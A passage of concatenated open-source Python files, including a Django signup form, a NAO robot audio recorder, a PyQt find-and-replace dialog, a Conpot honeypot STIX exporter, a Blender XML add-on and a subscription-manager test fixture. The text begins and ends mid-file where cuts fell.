h.execute(errata_id = errata_id, server_id = self.server_id) packages = h.fetchall_dict() ret = [] if not packages: return [] for package in packages: if package['name'] is not None: if package['epoch'] is None: package['epoch'] = "" pkg_arch = '' if multiarch: pkg_arch = package['arch'] or '' ret.append([package['name'], package['version'], package['release'], package['epoch'], pkg_arch]) return ret #----------------------------------------------------------------------------- if __name__ == "__main__": print "You can not run this module by itself" import sys; sys.exit(-1) #-----------------------------------------------------------------------------
Titulacion-Sistemas/PracticasDjango
usuarios_logueados/usuarios/models.py
from django import forms from django.contrib.auth.models import User from django.forms import ModelForm from django.db import models # Create your models here. #EDICION DE MODELO USER User.add_to_class('usuario_sico', models.CharField(max_length=10, null=False, blank=False)) User.add_to_class('contrasenia_sico', models.CharField(max_length=10, null=False, blank=False)) #User.add_to_class('amigos', models.ManyToManyField('self', symmetrical=True, blank=True)) #FORMULARIOS class SignUpForm(ModelForm): class Meta: model = User fields = ['username', 'password', 'email', 'first_name', 'last_name', 'usuario_sico', 'contrasenia_sico'] widgets = { 'password': forms.PasswordInput(), 'contrasenia_sico': forms.PasswordInput(), }
ioanaantoche/muhaha
ioana/RecordAudio.py
import sys import time from naoqi import ALProxy IP = "nao.local" PORT = 9559 if (len(sys.argv) < 2): print "Usage: 'python RecordAudio.py nume'" sys.exit(1) fileName = "/home/nao/" + sys.argv[1] + ".wav" aur = ALProxy("ALAudioRecorder", IP, PORT) channels = [0,0,1,0] aur.startMicrophonesRecording(fileName, "wav", 160000, channels) c=raw_input("Sfarsit?") aur.stopMicrophonesRecording() c=raw_input("play?") aup = ALProxy("ALAudioPlayer", IP, PORT) #Launchs the playing of a file aup.playFile(fileName,0.5,-1.0) c=raw_input("gata?") #Launchs the playing of a file #aup.playFile("/usr/share/naoqi/wav/random.wav") #Launchs the playing of a file on the left speaker to a volume of 50% #aup.playFile("/usr/share/naoqi/wav/random.wav",0.5,-1.0)
paradiseOffice/Bash_and_Cplus-plus
CPP/full_examples/pyqt/chap07/findandreplacedlg.py
#!/usr/bin/env python3 # Copyright (c) 2008-9 Qtrac Ltd. All rights reserved. # This program or module is free software: you can redistribute it and/or # modify it under the terms of the GNU General Public License as published # by the Free Software Foundation, either version 2 of the License, or # version 3 of the License, or (at your option) any later version. It is # provided for educational purposes and is distributed in the hope that # it will be useful, but WITHOUT ANY WARRANTY; without even the implied # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See # the GNU General Public License for more details. import re from PyQt4.QtCore import (Qt, SIGNAL, pyqtSignature) from PyQt4.QtGui import (QApplication, QDialog) import ui_findandreplacedlg MAC = True try: from PyQt4.QtGui import qt_mac_set_native_menubar except ImportError: MAC = False class FindAndReplaceDlg(QDialog, ui_findandreplacedlg.Ui_FindAndReplaceDlg): def __init__(self, text, parent=None): super(FindAndReplaceDlg, self).__init__(parent) self.__text = str(text) self.__index = 0 self.setupUi(self) if not MAC: self.findButton.setFocusPolicy(Qt.NoFocus) self.replaceButton.setFocusPolicy(Qt.NoFocus) self.replaceAllButton.setFocusPolicy(Qt.NoFocus) self.closeButton.setFocusPolicy(Qt.NoFocus) self.updateUi() @pyqtSignature("QString") def on_findLineEdit_textEdited(self, text): self.__index = 0 self.updateUi() def makeRegex(self): findText = str(self.findLineEdit.text()) if str(self.syntaxComboBox.currentText()) == "Literal": findText = re.escape(findText) flags = re.MULTILINE|re.DOTALL|re.UNICODE if not self.caseCheckBox.isChecked(): flags |= re.IGNORECASE if self.wholeCheckBox.isChecked(): findText = r"\b{0}\b".format(findText) return re.compile(findText, flags) @pyqtSignature("") def on_findButton_clicked(self): regex = self.makeRegex() match = regex.search(self.__text, self.__index) if match is not None: self.__index = match.end() self.emit(SIGNAL("found"), match.start()) else: self.emit(SIGNAL("notfound")) @pyqtSignature("") def on_replaceButton_clicked(self): regex = self.makeRegex() self.__text = regex.sub(str(self.replaceLineEdit.text()), self.__text, 1) @pyqtSignature("") def on_replaceAllButton_clicked(self): regex = self.makeRegex() self.__text = regex.sub(str(self.replaceLineEdit.text()), self.__text) def updateUi(self): enable = not self.findLineEdit.text().isEmpty() self.findButton.setEnabled(enable) self.replaceButton.setEnabled(enable) self.replaceAllButton.setEnabled(enable) def text(self): return self.__text if __name__ == "__main__": import sys text = """US experience shows that, unlike traditional patents, software patents do not encourage innovation and R&D, quite the contrary. In particular they hurt small and medium-sized enterprises and generally newcomers in the market. They will just weaken the market and increase spending on patents and litigation, at the expense of technological innovation and research. Especially dangerous are attempts to abuse the patent system by preventing interoperability as a means of avoiding competition with technological ability. --- Extract quoted from Linus Torvalds and Alan Cox's letter to the President of the European Parliament http://www.effi.org/patentit/patents_torvalds_cox.html""" def found(where): print("Found at {0}".format(where)) def nomore(): print("No more found") app = QApplication(sys.argv) form = FindAndReplaceDlg(text) form.connect(form, SIGNAL("found"), found) form.connect(form, SIGNAL("notfound"), nomore) form.show() app.exec_() print(form.text())
markes1977/conpot-master
conpot/core/loggers/stix_transform.py
# Copyright (C) 2013 Johnny Vestergaard <jkv@unixcluster.dk> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import json import ast import textwrap from mixbox import idgen from mixbox.namespaces import Namespace from stix.core import STIXHeader, STIXPackage from stix.common import InformationSource from stix.common.vocabs import VocabString from stix.incident import Incident from stix.incident.time import Time as StixTime from stix.indicator import Indicator from stix.ttp import TTP, VictimTargeting from stix.extensions.identity.ciq_identity_3_0 import CIQIdentity3_0Instance, STIXCIQIdentity3_0, OrganisationInfo from cybox.core import Observable from cybox.objects.socket_address_object import SocketAddress from cybox.objects.address_object import Address from cybox.objects.port_object import Port from cybox.objects.network_connection_object import NetworkConnection from cybox.objects.artifact_object import Artifact, ZlibCompression, Base64Encoding from cybox.common import ToolInformationList, ToolInformation from cybox.common import Time as CyboxTime from datetime import datetime import conpot CONPOT_NAMESPACE = 'mushmush-conpot' CONPOT_NAMESPACE_URL = 'http://mushmush.org/conpot' class StixTransformer(object): def __init__(self, config, dom): self.protocol_to_port_mapping = dict( modbus=502, snmp=161, http=80, s7comm=102, ) port_path_list = map(lambda x: '//conpot_template/protocols/'+x+'/@port', self.protocol_to_port_mapping.keys()) for port_path in port_path_list: try: protocol_port = ast.literal_eval(dom.xpath(port_path)[0]) protocol_name = port_path.rsplit("/", 2)[1] self.protocol_to_port_mapping[protocol_name] = protocol_port except IndexError: continue conpot_namespace = Namespace(CONPOT_NAMESPACE_URL, CONPOT_NAMESPACE, '') idgen.set_id_namespace(conpot_namespace) def _add_header(self, stix_package, title, desc): stix_header = STIXHeader() stix_header.title = title stix_header.description = desc stix_header.information_source = InformationSource() stix_header.information_source.time = CyboxTime() stix_header.information_source.time.produced_time = datetime.now() stix_package.stix_header = stix_header def transform(self, event): stix_package = STIXPackage() self._add_header(stix_package, "Unauthorized traffic to honeypot", "Describes one or more honeypot incidents") incident = Incident(id_="%s:%s-%s" % (CONPOT_NAMESPACE, 'incident', event['session_id'])) initial_time = StixTime() initial_time.initial_compromise = event['timestamp'].isoformat() incident.time = initial_time incident.title = "Conpot Event" incident.short_description = "Traffic to Conpot ICS honeypot" incident.add_category(VocabString(value='Scans/Probes/Attempted Access')) tool_list = ToolInformationList() tool_list.append(ToolInformation.from_dict({ 'name': "Conpot", 'vendor': "Conpot Team", 'version': conpot.__version__, 'description': textwrap.dedent('Conpot is a low interactive server side Industrial Control Systems ' 'honeypot designed to be easy to deploy, modify and extend.') })) incident.reporter = InformationSource(tools=tool_list) incident.add_discovery_method("Monitoring Service") incident.confidence = "High" # Victim Targeting by Sector ciq_identity = CIQIdentity3_0Instance() #identity_spec = STIXCIQIdentity3_0() #identity_spec.organisation_info = OrganisationInfo(industry_type="Electricity, Industrial Control Systems") #ciq_identity.specification = identity_spec ttp = TTP(title="Victim Targeting: Electricity Sector and Industrial Control System Sector") ttp.victim_targeting = VictimTargeting() ttp.victim_targeting.identity = ciq_identity incident.leveraged_ttps.append(ttp) indicator = Indicator(title="Conpot Event") indicator.description = "Conpot network event" indicator.confidence = "High" source_port = Port.from_dict({'port_value': event['remote'][1], 'layer4_protocol': 'tcp'}) dest_port = Port.from_dict({'port_value': self.protocol_to_port_mapping[event['data_type']], 'layer4_protocol': 'tcp'}) source_ip = Address.from_dict({'address_value': event['remote'][0], 'category': Address.CAT_IPV4}) dest_ip = Address.from_dict({'address_value': event['public_ip'], 'category': Address.CAT_IPV4}) source_address = SocketAddress.from_dict({'ip_address': source_ip.to_dict(), 'port': source_port.to_dict()}) dest_address = SocketAddress.from_dict({'ip_address': dest_ip.to_dict(), 'port': dest_port.to_dict()}) network_connection = NetworkConnection.from_dict( {'source_socket_address': source_address.to_dict(), 'destination_socket_address': dest_address.to_dict(), 'layer3_protocol': u"IPv4", 'layer4_protocol': u"TCP", 'layer7_protocol': event['data_type'], 'source_tcp_state': u"ESTABLISHED", 'destination_tcp_state': u"ESTABLISHED", } ) indicator.add_observable(Observable(network_connection)) artifact = Artifact() artifact.data = json.dumps(event['data']) artifact.packaging.append(ZlibCompression()) artifact.packaging.append(Base64Encoding()) indicator.add_observable(Observable(artifact)) incident.related_indicators.append(indicator) stix_package.add_incident(incident) stix_package_xml = stix_package.to_xml() return stix_package_xml
wukong-m2m/NanoKong
tools/python/scripts/installer.py
#!/usr/bin/env python import sys, os sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../master')) sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../master/wkpf')) print os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../master/wkpf') from wkpf.pynvc import * from wkpf.wkpfcomm import * comm = getComm() print "node ids", comm.getNodeIds() comm.setFeature(2, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(2, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(2, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(2, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(2, "WuKong") comm.setFeature(7, WKPF_FEATURE_LIGHT_SENSOR, 1) comm.setFeature(7, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(7, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(7, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(7, "WuKong") comm.setFeature(4, WKPF_FEATURE_LIGHT_SENSOR, 1) comm.setFeature(4, WKPF_FEATURE_LIGHT_ACTUATOR, 0) comm.setFeature(4, WKPF_FEATURE_NUMERIC_CONTROLLER, 1) comm.setFeature(4, WKPF_FEATURE_NATIVE_THRESHOLD, 1) comm.setLocation(4, "WuKong") comm.setFeature(5, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(5, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(5, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(5, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(5, "WuKong") comm.setFeature(6, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(6, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(6, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(6, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(6, "WuKong") comm.setFeature(13, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(13, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(13, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(13, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(13, "WuKong") comm.setFeature(14, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(14, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(14, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(14, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(14, "WuKong") comm.setFeature(15, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(15, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(15, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(15, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(15, "WuKong") comm.setFeature(10, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(10, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(10, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(10, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(10, "WuKong") comm.setFeature(12, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(12, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(12, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(12, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(12, "WuKong")
tweemeterjop/thug
thug/DOM/W3C/HTML/HTMLElement.py
#!/usr/bin/env python try: from io import StringIO except ImportError: try: from cStringIO import StringIO except ImportError: from StringIO import StringIO import bs4 as BeautifulSoup import logging from thug.DOM.W3C.Element import Element from thug.DOM.W3C.Style.CSS.ElementCSSInlineStyle import ElementCSSInlineStyle from .attr_property import attr_property log = logging.getLogger("Thug") class HTMLElement(Element, ElementCSSInlineStyle): id = attr_property("id") title = attr_property("title") lang = attr_property("lang") dir = attr_property("dir") className = attr_property("class", default = "") def __init__(self, doc, tag): Element.__init__(self, doc, tag) ElementCSSInlineStyle.__init__(self, doc, tag) def getInnerHTML(self): if not self.hasChildNodes(): return "" html = StringIO() for tag in self.tag.contents: html.write(unicode(tag)) return html.getvalue() def setInnerHTML(self, html): self.tag.clear() soup = BeautifulSoup.BeautifulSoup(html, "html5lib") for node in list(soup.head.descendants): self.tag.append(node) name = getattr(node, 'name', None) if name is None: continue handler = getattr(log.DFT, 'handle_%s' % (name, ), None) if handler: handler(node) for node in list(soup.body.children): self.tag.append(node) name = getattr(node, 'name', None) if name is None: continue handler = getattr(log.DFT, 'handle_%s' % (name, ), None) if handler: handler(node) # soup.head.unwrap() # soup.body.unwrap() # soup.html.wrap(self.tag) # self.tag.html.unwrap() for node in self.tag.descendants: name = getattr(node, 'name', None) if not name: continue p = getattr(self.doc.window.doc.DFT, 'handle_%s' % (name, ), None) if p is None: p = getattr(log.DFT, 'handle_%s' % (name, ), None) if p: p(node) innerHTML = property(getInnerHTML, setInnerHTML) # WARNING: NOT DEFINED IN W3C SPECS! def focus(self): pass @property def sourceIndex(self): return None
PoisonBOx/PyGames
2.Pie/drawLine.py
import sys import pygame from pygame.locals import * pygame.init() screen = pygame.display.set_mode((600, 500)) pygame.display.set_caption("Drawing Lines") screen.fill((0, 80, 0)) # draw the line color = 100, 255, 200 width = 8 pygame.draw.line(screen, color, (100, 100), (500, 400), width) pygame.display.update() while True: for event in pygame.event.get(): if event.type in (QUIT, KEYDOWN): sys.exit()
JConwayAWT/PGSS14CC
lib/python/multimetallics/ase/cluster/cubic.py
""" Function-like objects that creates cubic clusters. """ import numpy as np from ase.data import reference_states as _refstate from ase.cluster.factory import ClusterFactory class SimpleCubicFactory(ClusterFactory): spacegroup = 221 xtal_name = 'sc' def get_lattice_constant(self): "Get the lattice constant of an element with cubic crystal structure." symmetry = _refstate[self.atomic_numbers[0]]['symmetry'] if symmetry != self.xtal_name: raise ValueError, ("Cannot guess the %s " % (self.xtal_name,) + "lattice constant of an element with crystal " + "structure %s." % (symmetry,)) return _refstate[self.atomic_numbers[0]]['a'] def set_basis(self): a = self.lattice_constant if not isinstance(a, (int, float)): raise ValueError("Improper lattice constant for %s crystal." % (self.xtal_name,)) self.lattice_basis = np.array([[a, 0., 0.], [0., a, 0.], [0., 0., a]]) self.resiproc_basis = self.get_resiproc_basis(self.lattice_basis) SimpleCubic = SimpleCubicFactory() class BodyCenteredCubicFactory(SimpleCubicFactory): xtal_name = 'bcc' atomic_basis = np.array([[0., 0., 0.], [.5, .5, .5]]) BodyCenteredCubic = BodyCenteredCubicFactory() class FaceCenteredCubicFactory(SimpleCubicFactory): xtal_name = 'fcc' atomic_basis = np.array([[0., 0., 0.], [0., .5, .5], [.5, 0., .5], [.5, .5, 0.]]) FaceCenteredCubic = FaceCenteredCubicFactory()
Urinx/SomeCodes
Python/others/practice/finding_if_prime.py
#!/usr/bin/python3 import math import random def finding_prime(number): num=abs(number) if num<4: return True for x in range(2,num): if num%x == 0: return False return True def finding_prime_sqrt(number): num=abs(number) if num<4: return True for x in range(2,int(math.sqrt(num))+1): if number%x == 0: return False return True def finding_prime_fermat(number): if number<=102: for a in range(2,number): if pow(a,number-1,number)!=1: return False return True else: for i in range(100): a=random.randint(2,number-1) if pow(a,number-1,number)!=1: return False return True def test_finding_prime(): number1=17 number2=20 assert(finding_prime(number1)==True) assert(finding_prime(number2)==False) assert(finding_prime_sqrt(number1)==True) assert(finding_prime_sqrt(number2)==False) assert(finding_prime_fermat(number1)==True) assert(finding_prime_fermat(number2)==False) print('Tests passed!') if __name__=='__main__': test_finding_prime()
ProfessorX/Config
.PyCharm30/system/python_stubs/-1247972723/_dbus_bindings/UInt64.py
# encoding: utf-8 # module _dbus_bindings # from /usr/lib/python2.7/dist-packages/_dbus_bindings.so # by generator 1.135 """ Low-level Python bindings for libdbus. Don't use this module directly - the public API is provided by the `dbus`, `dbus.service`, `dbus.mainloop` and `dbus.mainloop.glib` modules, with a lower-level API provided by the `dbus.lowlevel` module. """ # imports import dbus.lowlevel as __dbus_lowlevel from _LongBase import _LongBase class UInt64(_LongBase): """ An unsigned 64-bit integer between 0 and 0xFFFF FFFF FFFF FFFF, represented as a subtype of `long`. This type only exists on platforms where the C compiler has suitable 64-bit types, such as C99 ``unsigned long long``. Constructor:: dbus.UInt64(value: long[, variant_level: int]) -> UInt64 ``value`` must be within the allowed range, or `OverflowError` will be raised. ``variant_level`` must be non-negative; the default is 0. :IVariables: `variant_level` : int Indicates how many nested Variant containers this object is contained in: if a message's wire format has a variant containing a variant containing a uint64, this is represented in Python by a UInt64 with variant_level==2. """ def __init__(self, value, variant_level=None): # real signature unknown; restored from __doc__ pass @staticmethod # known case of __new__ def __new__(S, *more): # real signature unknown; restored from __doc__ """ T.__new__(S, ...) -> a new object with type S, a subtype of T """ pass
chebhou/Text-from-to-.XML
text_io_xml.py
bl_info = { "name" : "text objects to-from xml", "author" : "chebhou", "version" : (1, 0), "blender" : (2, 7, 3), "location" : "file->export->text to-from xml", "discription" : "copys an text objectx from-to xml file", "wiki_url" : " https://github.com/chebhou", "tracker_url" : "https://github.com/chebhou", "category" : "Import-Export" } import bpy from bpy.types import Operator from bpy_extras.io_utils import ExportHelper from bpy.props import EnumProperty, BoolProperty from xml.dom import minidom from xml.dom.minidom import Document def txt_sync(filepath): dom = minidom.parse(filepath) scenes =dom.getElementsByTagName('scene') for scene in scenes: scene_name=scene.getAttribute('name') print("\n",scene_name) bl_scene = bpy.data.scenes[scene_name] txt_objs =scene.getElementsByTagName('object') for obj in txt_objs: obj_name = obj.getAttribute('name') obj_body = obj.childNodes[0].nodeValue bl_obj = bl_scene.objects[obj_name].data.body = obj_body print(obj_name," ",obj_body) def txt_export(filepath): doc = Document() root = doc.createElement('data') doc.appendChild(root) for sce in bpy.data.scenes : #create a scene scene = doc.createElement('scene') scene.setAttribute('name', sce.name) root.appendChild(scene) for obj in sce.objects : if obj.type == 'FONT': #add object element object = doc.createElement('object') object.setAttribute('name', obj.name) txt_node = doc.createTextNode(obj.data.body) object.appendChild(txt_node) scene.appendChild(object) #write to a file file_handle = open(filepath,"wb") file_handle.write(bytes(doc.toprettyxml(indent='\t'), 'UTF-8')) file_handle.close() class text_export(Operator, ExportHelper): """write and read text objects to a file""" bl_idname = "export_scene.text_xml" bl_label = "text from-to xml" bl_options = {'REGISTER', 'UNDO'} #should remove undo ? # ExportHelper mixin class uses this filename_ext = ".xml" #parameters and variables convert = EnumProperty( name="Convert", description="Choose conversion", items=(('W', "write objects", "write text objects to xml"), ('R', "read objects", "read text objects from xml")), default='W', ) #main function def execute(self, context): bpy.ops.object.mode_set(mode = 'OBJECT') if self.convert == 'W': txt_export(self.filepath) else: txt_sync(self.filepath) bpy.context.scene.update() self.report({'INFO'},"Conversion is Done") return {'FINISHED'} def menu_func_export(self, context): self.layout.operator(text_export.bl_idname, text="Text to-from xml") def register(): bpy.utils.register_class(text_export) bpy.types.INFO_MT_file_export.append(menu_func_export) bpy.types.INFO_MT_file_import.append(menu_func_export) def unregister(): bpy.utils.unregister_class(text_export) bpy.types.INFO_MT_file_export.remove(menu_func_export) bpy.types.INFO_MT_file_import.append(menu_func_export) if __name__ == "__main__": register()
Lorquas/subscription-manager
test/fixture.py
from __future__ import print_function, division, absolute_import import difflib import locale import os import pprint import six import sys import tempfile try: import unittest2 as unittest except ImportError: import unittest # just log py.warnings (and pygtk warnings in particular) import logging try: # 2.7+ logging.captureWarnings(True) except AttributeError: pass from mock import Mock, MagicMock, NonCallableMock, patch, mock_open from contextlib import contextmanager from . import stubs import subscription_manager.injection as inj import subscription_manager.managercli from rhsmlib.services import config # use instead of the normal pid file based ActionLock from threading import RLock if six.PY2: OPEN_FUNCTION = '__builtin__.open' else: OPEN_FUNCTION = 'builtins.open' @contextmanager def open_mock(content=None, **kwargs): content_out = six.StringIO() m = mock_open(read_data=content) with patch(OPEN_FUNCTION, m, create=True, **kwargs) as mo: stream = six.StringIO(content) rv = mo.return_value rv.write = lambda x: content_out.write(x) rv.content_out = lambda: content_out.getvalue() rv.__iter__ = lambda x: iter(stream.readlines()) yield rv @contextmanager def open_mock_many(file_content_map=None, **kwargs): """ Mock out access to one or many files opened using the builtin "open". :param file_content_map: A dictionary of path : file_contents :type file_content_map: dict[str,str] :param kwargs: :return: """ file_content_map = file_content_map or {} for key, value in file_content_map.items(): file_content_map[key] = (mock_open(read_data=value), value, six.StringIO()) def get_file(path, *args, **kwargs): """ The side effect that will allow us to "open" the right "file". Not for use outside open_mock_many. :param path: The path which is passed in to the built :param args: :param kwargs: :return: """ try: rv, file_contents, content_out = file_content_map[path] except KeyError: if six.PY2: raise IOError(2, 'No such file or directory') else: raise OSError(2, 'No such file or directory') rv = rv.return_value rv.write = lambda x: content_out.write(x) rv.content_out = lambda: content_out.getvalue() return rv with patch(OPEN_FUNCTION, **kwargs) as mo: mo.side_effect = get_file yield mo @contextmanager def temp_file(content, *args, **kwargs): try: kwargs['delete'] = False kwargs.setdefault('prefix', 'sub-man-test') fh = tempfile.NamedTemporaryFile(mode='w+', *args, **kwargs) fh.write(content) fh.close() yield fh.name finally: os.unlink(fh.name) @contextmanager def locale_context(new_locale, category=None): old_category = category or locale.LC_CTYPE old_locale = locale.getlocale(old_category) category = category or locale.LC_ALL locale.setlocale(category, new_locale) try: yield finally: locale.setlocale(category, old_locale) class FakeLogger(object): def __init__(self): self.expected_msg = "" self.msg = None self.logged_exception = None def debug(self, buf, *args, **kwargs): self.msg = buf def error(self, buf, *args, **kwargs): self.msg = buf def exception(self, e, *args, **kwargs): self.logged_exception = e def set_expected_msg(self, msg): self.expected_msg = msg def info(self, buf, *args, **kwargs): self.msg = buf def warning(self, buf, *args, **kwargs): self.msg = buf class FakeException(Exception): def __init__(self, msg=None): self.msg = msg def __str__(self): return repr(self.msg) class Matcher(object): @staticmethod def set_eq(first, second): """Useful for dealing with sets that have been cast to or instantiated as lists.""" return set(first) == set(second) def __init__(self, compare, some_obj): self.compare = compare self.some_obj = some_obj def __eq__(self, other): return self.compare(self.some_obj, other) class SubManFixture(unittest.TestCase): def set_facts(self): """Override if you need to set facts for a test.""" return {"mock.facts": "true"} """ Can be extended by any subscription manager test case to make sure nothing on the actual system is read/touched, and appropriate mocks/stubs are in place. """ def setUp(self): # No matter what, stop all patching (even if we have a failure in setUp itself) self.addCleanup(patch.stopall) # Never attempt to use the actual managercli.cfg which points to a # real file in etc. self.mock_cfg_parser = stubs.StubConfig() original_conf = subscription_manager.managercli.conf def unstub_conf(): subscription_manager.managercli.conf = original_conf # Mock makes it damn near impossible to mock a module attribute (which we shouldn't be using # in the first place because it's terrible) so we monkey-patch it ourselves. # TODO Fix this idiocy by not reading the damn config on module import subscription_manager.managercli.conf = config.Config(self.mock_cfg_parser) self.addCleanup(unstub_conf) facts_host_patcher = patch('rhsmlib.dbus.facts.FactsClient', auto_spec=True) self.mock_facts_host = facts_host_patcher.start() self.mock_facts_host.return_value.GetFacts.return_value = self.set_facts() # By default mock that we are registered. Individual test cases # can override if they are testing disconnected scenario. id_mock = NonCallableMock(name='FixtureIdentityMock') id_mock.exists_and_valid = Mock(return_value=True) id_mock.uuid = 'fixture_identity_mock_uuid' id_mock.name = 'fixture_identity_mock_name' id_mock.cert_dir_path = "/not/a/real/path/to/pki/consumer/" id_mock.keypath.return_value = "/not/a/real/key/path" id_mock.certpath.return_value = "/not/a/real/cert/path" # Don't really care about date ranges here: self.mock_calc = NonCallableMock() self.mock_calc.calculate.return_value = None # Avoid trying to read real /etc/yum.repos.d/redhat.repo self.mock_repofile_path_exists_patcher = patch('subscription_manager.repolib.YumRepoFile.path_exists') mock_repofile_path_exists = self.mock_repofile_path_exists_patcher.start() mock_repofile_path_exists.return_value = True inj.provide(inj.IDENTITY, id_mock) inj.provide(inj.PRODUCT_DATE_RANGE_CALCULATOR, self.mock_calc) inj.provide(inj.ENTITLEMENT_STATUS_CACHE, stubs.StubEntitlementStatusCache()) inj.provide(inj.POOL_STATUS_CACHE, stubs.StubPoolStatusCache()) inj.provide(inj.PROD_STATUS_CACHE, stubs.StubProductStatusCache()) inj.provide(inj.CONTENT_ACCESS_MODE_CACHE, stubs.StubContentAccessModeCache()) inj.provide(inj.SUPPORTED_RESOURCES_CACHE, stubs.StubSupportedResourcesCache()) inj.provide(inj.SYSPURPOSE_VALID_FIELDS_CACHE, stubs.StubSyspurposeValidFieldsCache()) inj.provide(inj.CURRENT_OWNER_CACHE, stubs.StubCurrentOwnerCache) inj.provide(inj.OVERRIDE_STATUS_CACHE, stubs.StubOverrideStatusCache()) inj.provide(inj.RELEASE_STATUS_CACHE, stubs.StubReleaseStatusCache()) inj.provide(inj.AVAILABLE_ENTITLEMENT_CACHE, stubs.StubAvailableEntitlementsCache()) inj.provide(inj.PROFILE_MANAGER, stubs.StubProfileManager()) # By default set up an empty stub entitlement and product dir. # Tests need to modify or create their own but nothing should hit # the system. self.ent_dir = stubs.StubEntitlementDirectory() inj.provide(inj.ENT_DIR, self.ent_dir) self.prod_dir = stubs.StubProductDirectory() inj.provide(inj.PROD_DIR, self.prod_dir) # Installed products manager needs PROD_DIR injected first inj.provide(inj.INSTALLED_PRODUCTS_MANAGER, stubs.StubInstalledProductsManager()) self.stub_cp_provider = stubs.StubCPProvider() self._release_versions = [] self.stub_cp_provider.content_connection.get_versions = self._get_release_versions inj.provide(inj.CP_PROVIDER, self.stub_cp_provider) inj.provide(inj.CERT_SORTER, stubs.StubCertSorter()) # setup and mock the plugin_manager plugin_manager_mock = MagicMock(name='FixturePluginManagerMock') plugin_manager_mock.runiter.return_value = iter([]) inj.provide(inj.PLUGIN_MANAGER, plugin_manager_mock) inj.provide(inj.DBUS_IFACE, Mock(name='FixtureDbusIfaceMock')) pooltype_cache = Mock() inj.provide(inj.POOLTYPE_CACHE, pooltype_cache) # don't use file based locks for tests inj.provide(inj.ACTION_LOCK, RLock) self.stub_facts = stubs.StubFacts() inj.provide(inj.FACTS, self.stub_facts) content_access_cache_mock = MagicMock(name='ContentAccessCacheMock') inj.provide(inj.CONTENT_ACCESS_CACHE, content_access_cache_mock) self.dbus_patcher = patch('subscription_manager.managercli.CliCommand._request_validity_check') self.dbus_patcher.start() # No tests should be trying to connect to any configure or test server # so really, everything needs this mock. May need to be in __init__, or # better, all test classes need to use SubManFixture self.is_valid_server_patcher = patch("subscription_manager.managercli.is_valid_server_info") is_valid_server_mock = self.is_valid_server_patcher.start() is_valid_server_mock.return_value = True # No tests should be trying to test the proxy connection # so really, everything needs this mock. May need to be in __init__, or # better, all test classes need to use SubManFixture self.test_proxy_connection_patcher = patch("subscription_manager.managercli.CliCommand.test_proxy_connection") test_proxy_connection_mock = self.test_proxy_connection_patcher.start() test_proxy_connection_mock.return_value = True self.syncedstore_patcher = patch('subscription_manager.syspurposelib.SyncedStore') syncedstore_mock = self.syncedstore_patcher.start() set_up_mock_sp_store(syncedstore_mock) self.files_to_cleanup = [] def tearDown(self): if not hasattr(self, 'files_to_cleanup'): return for f in self.files_to_cleanup: # Assuming these are tempfile.NamedTemporaryFile, created with # the write_tempfile() method in this class. f.close() def write_tempfile(self, contents): """ Write out a tempfile and append it to the list of those to be cleaned up in tearDown. """ fid = tempfile.NamedTemporaryFile(mode='w+', suffix='.tmp') fid.write(contents) fid.seek(0) self.files_to_cleanup.append(fid) return fid def set_consumer_auth_cp(self, consumer_auth_cp): cp_provider = inj.require(inj.CP_PROVIDER) cp_provider.consumer_auth_cp = consumer_auth_cp def get_consumer_cp(self): cp_provider = inj.require(inj.CP_PROVIDER) consumer_cp = cp_provider.get_consumer_auth_cp() return consumer_cp # The ContentConnection used for reading release versions from # the cdn. The injected one uses this. def _get_release_versions(self, listing_path): return self._release_versions # For changing injection consumer id to one that fails "is_valid" def _inject_mock_valid_consumer(self, 